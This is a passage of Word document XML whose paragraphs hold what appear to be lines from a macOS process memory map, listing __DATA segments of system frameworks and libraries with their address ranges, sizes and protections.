        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77e15000-00007fff77e16000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGL.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77eb3000-00007fff77ed9000 [  152K] rw-/rwx SM=COW  /usr/lib/libcrypto.0.9.8.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77ef5000-00007fff77ef7000 [    8K] rw-/rwx SM=COW  /usr/lib/libsandbox.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77ef7000-00007fff77efe000 [   28K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CoreDaemon.framework/Versions/B/CoreDaemon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77efe000-00007fff77f05000 [   28K] rw-/rwx SM=COW  ...eworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libFontRegistry.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77f05000-00007fff77f19000 [   80K] rw-/rwx SM=COW  /System/Library/Frameworks/SecurityFoundation.framework/Versions/A/SecurityFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77f1d000-00007fff77f1e000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libcache.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77f1e000-00007fff77f1f000 [    4K] rw-/rwx SM=COW  /usr/lib/libpam.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77f1f000-00007fff77f20000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libPng.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77f20000-00007fff77f29000 [   36K] rw-/rwx SM=COW  /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77f2e000-00007fff77f32000 [   16K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/DebugSymbols.framework/Versions/A/DebugSymbols</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77f33000-00007fff77f45000 [   72K] rw-/rwx SM=COW  /System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77f45000-00007fff77f54000 [   60K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Heimdal.framework/Versions/A/Heimdal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77f54000-00007fff77f5c000 [   32K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/ApplePushService.framework/Versions/A/ApplePushService</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77f62000-00007fff77f7a000 [   96K] rw-/rwx SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/ImageIO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77f7a000-00007fff77f7c000 [    8K] rw-/rwx SM=COW  ...brary/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/LangAnalysis.framework/Versions/A/LangAnalysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77fb6000-00007fff77fc3000 [   52K] rw-/rwx SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vImage.framework/Versions/A/vImage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77fc3000-00007fff77fc4000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLU.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff77fdb000-00007fff78000000 [  148K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fff78000000-00007fff78025000 [  148K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78025000-00007fff78086000 [  388K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/AppleJPEG.framework/Versions/A/AppleJPEG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78086000-00007fff78088000 [    8K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/ChunkingLibrary.framework/Versions/A/ChunkingLibrary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78088000-00007fff780bb000 [  204K] rw-/rwx SM=COW  /System/Library/Frameworks/CloudKit.framework/Versions/A/CloudKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78129000-00007fff7812c000 [   12K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CrashReporterSupport.framework/Versions/A/CrashReporterSupport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7812c000-00007fff7812e000 [    8K] rw-/rwx SM=COW  /usr/lib/system/libcommonCrypto.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7812e000-00007fff7812f000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvDSP.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78153000-00007fff78157000 [   16K] rw-/rwx SM=COW  /usr/lib/system/libcorecrypto.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78157000-00007fff7815d000 [   24K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenDirectory.framework/Versions/A/OpenDirectory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7815d000-00007fff7815e000 [    4K] rw-/rwx SM=COW  /usr/lib/libbz2.1.0.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78179000-00007fff7817c000 [   12K] rw-/rwx SM=COW  /usr/lib/system/libsystem_info.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7819e000-00007fff7819f000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_coreservices.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78457000-00007fff78458000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvMisc.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78458000-00007fff784ae000 [  344K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff785a4000-00007fff785ba000 [   88K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/CarbonCore.framework/Versions/A/CarbonCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff785ba000-00007fff785db000 [  132K] rw-/rwx SM=COW  /usr/lib/libicucore.A.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff785db000-00007fff785e1000 [   24K] rw-/rwx SM=COW  /System/Library/Frameworks/GSS.framework/Versions/A/GSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff785e2000-00007fff785e3000 [    4K] rw-/rwx SM=COW  /usr/lib/libOpenScriptingUtil.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff785ec000-00007fff785fe000 [   72K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CloudDocs.framework/Versions/A/CloudDocs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78732000-00007fff7878a000 [  352K] rw-/rwx SM=COW  /System/Library/Frameworks/CFNetwork.framework/Versions/A/CFNetwork</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7878a000-00007fff7878c000 [    8K] rw-/rwx SM=COW  /usr/lib/libauto.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7878c000-00007fff78794000 [   32K] rw-/rwx SM=COW  /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/ATS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fff787da000-00007fff787db000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_stats.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff787ed000-00007fff78800000 [   76K] rw-/rwx SM=COW  .../Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/LaunchServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78800000-00007fff78812000 [   72K] rw-/rwx SM=COW  .../Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/LaunchServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78817000-00007fff7881a000 [   12K] rw-/rwx SM=COW  ...Frameworks/ApplicationServices.framework/Versions/A/Frameworks/SpeechSynthesis.framework/Versions/A/SpeechSynthesis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7881a000-00007fff7881b000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/ServiceManagement.framework/Versions/A/ServiceManagement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78843000-00007fff78844000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/AppleSRP.framework/Versions/A/AppleSRP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff788a2000-00007fff788a3000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libmacho.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff788ed000-00007fff788ee000 [    4K] rw-/rwx SM=COW  /usr/lib/liblzma.5.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff788ee000-00007fff788ef000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libdyld.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
